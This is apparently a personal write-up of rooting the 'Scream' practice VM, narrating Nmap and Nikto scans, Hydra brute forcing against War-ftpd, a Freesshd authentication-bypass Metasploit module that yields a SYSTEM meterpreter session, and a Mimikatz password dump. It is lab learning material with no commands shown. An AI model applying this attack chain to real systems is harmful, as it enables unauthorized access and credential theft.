This post contains the steps to get a root shell with Scream VM
Ok, let’s do this write-up !
As always, we need to discover where the machine is on our network. To do so, let’s use Nmap:
After getting the IP address (192.168.1.2), we need to do some fingerprinting.
Fig. Nmap scan result
As I saw it in the scan report, I decided to scan the port 80 with Nikto.
Fig. Nikto report on ports 80 (HTTP)
There was no interesting file or any ‘obvious’ vulnerability.
Then, I started to check the FTP server because the Banner was “War-ftpd”. I logged in with the anonymous user but after a while, I got blacklisted..
I guess the FTP server didn’t appreciate my attempts to exploit War-ftpd flaws, while trying to crack the ftp account with Hydra.
And, I got banned.
Fig. Time out of the FTP connection after getting blacklisted
Then, the lat attempt was with the SSH Server with the curious Banner “WeOnlyDo sshd 2.1.3”.. Mh.. This custom banner was interesting.
I decided to go further with the SSH service.
I started browsing on the internet to find some sshd vulnerabilities on Windows platform. Then, I found : Freesshd Authentication Bypass Metasploit module.
Fig. Looking for a Freesshd exploit
I decided to check it out. I knew there was an account called ftp but this didn’t work.
Fig. Setting the payload for the Freesshd exploit
So, I decided to bruteforce the logins using the file provided by Metasploit.
And.. It worked !
Fig. Successful exploitation with Freesshd exploit
Thanks to this vulnerability, I got a meterpreter session with SYSTEM privileges. Awesome !
We had a SYSTEM session but I was curious and I wanted to practice with Mimikatz. A (security) tool developed by a french guy who did some awesome work. In few words, it allows you to dump passwords with are stored in the memory.
Combined with our meterpreter, we’ve been able to load mimikatz and get the password: thisisaverylongpassword. And yes, it is.
Fig. Dumping passwords using Mimikatz
First Windows VM I’ve tried here and it was a great surprise. I learnt few tricks and that was nice.
Hope you liked it and good evening !